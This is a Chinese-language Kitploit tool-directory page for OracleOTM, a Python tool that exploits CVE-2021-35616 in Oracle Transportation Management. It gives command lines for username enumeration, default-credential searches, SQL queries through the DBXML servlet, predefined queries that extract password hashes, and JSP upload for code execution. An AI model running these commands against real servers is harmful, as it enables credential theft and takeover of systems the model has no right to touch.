Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OracleOTM — 用于利用CVE-2021-35616的Python工具 | Kitploit
工具/GitHubGitHub/ofirhamam/oracleotm
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试数据库安全
GitHubofirhamam/oracleotm

OracleOTM

用于利用CVE-2021-35616的Python工具

查看仓库
1114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OracleOTM

用于利用 CVE-2021-35616 的 Python 工具

该脚本按模块工作,我按以下顺序实现:

► 用户名枚举

► 搜索默认凭据

► 使用 DBXML servlet 运行 SQL 查询

► 完全利用与 JSP 执行

脚本语法如下:

.\OracleOTM.py {module} {host TXT file} {additional parameters}

用户名枚举:.\OracleOTM.py enum {hosts TXT file} -u users.txt

搜索默认凭据:.\OracleOTM.py default {hosts TXT file}

使用 DBXML servlet 运行 SQL 查询:.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

我还准备了一些我认为有用的预定义查询;你可以直接使用它们,如下所示:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os

root@kitploit:~
OS – 提取服务器操作系统

Osuser – 提取运行数据库的操作系统用户

Hostname – 数据库服务器主机名

Hostip – 数据库服务器 IP 地址

Passwords – 提取 OTM 用户及其哈希密码

Oraversion – 数据库版本

Dbusershash – 数据库用户密码哈希

Dbfileslocation – 数据库文件在操作系统中的位置

完全利用与 JSP 执行:.\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"

下载工具